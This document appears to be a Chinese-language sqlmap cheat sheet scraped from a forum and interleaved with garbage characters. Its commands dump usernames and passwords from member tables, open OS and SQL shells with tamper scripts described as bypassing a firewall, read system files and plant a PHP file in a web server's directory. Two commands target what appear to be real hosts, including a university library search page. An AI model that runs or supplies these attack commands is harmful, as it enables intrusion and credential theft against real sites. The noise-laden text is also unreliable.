/pentest/database/sqlmap
+ e M- ?9 F0 I: s, m/ h$ S' g) E5 k8 N G( z9 I+ i5 U; L
update :::::> in the folder after execute following order : svn update
. I. z. H% _* _ N' L m
9 @/ j+ N7 m! m9 G/ a9 `sqlmap.py -r 1.txt --current-db
' k$ p( y) i# K8 N" _" s$ V& H9 \& l; l# x; F. ^
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
3 t7 i1 w0 b' l6 P+ E+ Z' \+ F* y4 v5 G+ e5 ~; B% H
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
3 J' ?* P$ ~; n* _7 M猜解数据库
" `# y7 z2 N& x# D) Q9 |./sqlmap.py -u "injection-url" --dbs
" Z& `( y: b4 [7 z: [2 hsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"+ E1 V0 f9 V# z5 r/ T% \3 N
& R" D4 b P; t# P& ?: f) e# n3 Z, O
猜解表名
( U- O; |* ~/ L( c, ^' K/ E./sqlmap.py -u "injection-url" -D database_name --tables
6 n& @5 C( s5 n x$ J# D; G+ A2 M3 U! t3 z' h
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
: b) ^8 b5 Z, Z! j+ qsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" , ?4 M8 l( D" N, ?
9 Q! c Z {" M7 U& Psqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump1 u: ^( a( ~" K* U5 J
' O( j1 R# B2 I' C2 g
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
. p [1 y' i, h3 Q' Csqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
' d* X: _. d; Z( m* h, @sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ! a0 s. }" a9 w
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"7 t1 R" R' G. k* F
& ^$ N8 k6 H* Y/ D1 G. L+ \5 E1 W3 [
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
3 }; F. `, L- O; u" |8 _" i. C2 [& Nsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"* R6 g# @. C/ _
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"9 |7 \7 r% L. E, A7 B5 T# e
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"1 w4 G0 p, k" B4 d. G g
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump& _' n* ?3 S& g& `: z
* _7 i& t: v# U8 {/ ?3 R- C D
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了* `! O# [2 n# V+ a/ l" r% C
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py") l; D3 \' s. W. F
; r' a, D' q" P
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"! X9 D- H( b' Q. B+ W" s
猜解列名
. f6 F* O' K4 s7 v6 _./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
9 p2 P% }. Y! c+ g. V; x2 K1 _ h' R: p- O. e+ t2 {! B9 J& V
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
" D- {- X4 n Q) E5 T: \# wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
3 R9 k4 ?; o0 F' w! j! Y) \# usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"2 }7 F( I( ]7 |+ r! E# K5 H, ~: g
* @* K+ f- b1 j' Bsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
/ N4 X$ J: y \: ~% L&submit=Go6 g- g3 P/ g" M: P+ q0 m( j# D
猜解值
+ k9 Y' n& r. S7 |/ y./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump0 q y, ~# T: f0 d- @
========================================================
; Z+ ~9 f( w# ]搜索表名中包括mana字符的
# Z2 S! Q7 i3 @6 w/sqlmap.py -u "injection-url" -T mana --search. o# k! f# B3 w# E7 S! W( ?3 P$ b
返回一个交互式sql shell
. u' d0 V. J7 q/sqlmap.py -u "injection-url" --sql-shell) u1 f9 z' ?+ i$ w# `! Z( D
读取指定文件(需权限)* R$ {6 R' C" H: B- a- \' p+ t% P
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
5 E/ k7 T9 G7 t3 B; T查看当前 用户 及 数据库
' b: k, ~# x- | Y1 L, D/sqlmap.py -u "injection-url" --current-user --current-db/ z9 h3 o* { Z: @' n) H
本地文件 写入 远程目标绝对路径' B2 I8 Z3 B% W5 D' x4 k) q6 `2 F' K3 `
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径2 _7 H! _+ f: u* }5 q$ i
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" " _7 B& U( S4 |! N2 ~
3 v" |2 ] @& X: @3 D: u+ m; r% dsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 p/ W1 Y( ]: I# Y, v: E查看某用的权限' ^- D" q8 f- K/ M1 G' k: Y9 Z* C
/sqlmap.py -u "injection-url" --privileges -U root
+ f+ J4 b5 L2 Z查看当前用户是否为dba+ H. ?& m0 v/ w
/sqlmap.py -u "injection-url" --is-dba
7 Z2 v; V$ [) ~ D读取所有数据库用户或指定数据库用户的密码9 g1 @3 n2 h0 a; Z" U- @
sqlmap.py -r 1.txt --users --passwords& _7 t! c3 Y3 u9 S8 w
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 6 a5 E+ I N0 x8 ]' C
! j/ u; {' [4 |8 Q' }4 |- ?$ {* Q6 W
/sqlmap.py -u "injection-url" --passwords -U root
5 l- {& ]& k+ s0 _ ^
2 t( I; Y5 D. u; I. `! l--start&&--stop 与 --first&&--last 的区别- r# C) u9 H1 [9 t
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
+ f; N+ f6 ^0 G4 y& N# ]+ @" R/ Z" U8 E5 x% x! Z1 \
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)4 Y7 K3 r; A( k8 Y4 F
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
( j" g; F- U* m# G/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
! o4 \- Q# k" M0 O9 M m4 f( J" v$ w5 j/ M1 p3 Y
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)+ _' P4 X7 K, ^6 f
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
6 n0 d. J# f+ k& _" c* v/ A7 u4 ~! e" Y" {/ O. j, J
|